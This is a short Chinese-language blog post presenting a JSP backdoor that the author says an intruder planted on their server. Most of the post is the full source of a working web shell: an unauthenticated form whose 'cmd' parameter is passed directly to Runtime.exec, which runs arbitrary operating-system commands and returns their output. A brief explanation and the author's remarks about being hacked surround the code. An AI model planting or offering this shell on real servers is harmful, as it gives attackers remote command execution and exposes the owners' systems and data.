jsp后门代码如何实现
今天我给大家弄来了一个后门的代码实现
一定会有人问我怎么学会的
代码解释
这段代码是一个简单的Web界面,其中包含一个文本输入框和一个提交按钮。当用户在输入框中输入命令并单击提交按钮时,将运行该命令并显示命令的输出结果。代码利用Java的Runtime类的exec()方法,可以在操作系统上执行一个命令。此外,代码还检查操作系统类型,并选择适当的命令执行方式。其中,“pwd”命令用于获取当前运行目录,而其他命令将以用户输入的形式执行。需要注意的是,这段代码可能存在安全风险,因为用户可以输入任何他们想要执行的命令。
代码展示
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
if (request.getParameter("cmd").equals("pwd")) {
out.println(System.getProperty("catalina.base"));
} else {
StringBuffer output = new StringBuffer();
Process p;
if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) {
p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));
} else {
File dir = new File(System.getProperty("catalina.base"));
p = Runtime.getRuntime().exec(request.getParameter("cmd"), null, dir);
}
String line = "";
BufferedReader reader = new BufferedReader(new InputStreamReader(p.getErrorStream()));
while ((line = reader.readLine()) != null) {
output.append(line + "\n");
}
reader.close();
reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
while ((line = reader.readLine()) != null) {
output.append(line + "\n");
}
out.println(output.toString());
}
}
%>
</pre>
</BODY></HTML>
被入侵后做了什么呢
这是服务器日志
说实话,我这个服务器也没什么,别人是怎么发现的呢,我真的百思不得其解。难道是我挂的t子被监听了?
最后
入侵我服务器的我谢谢你让我学会了如何写后门
评论 (0)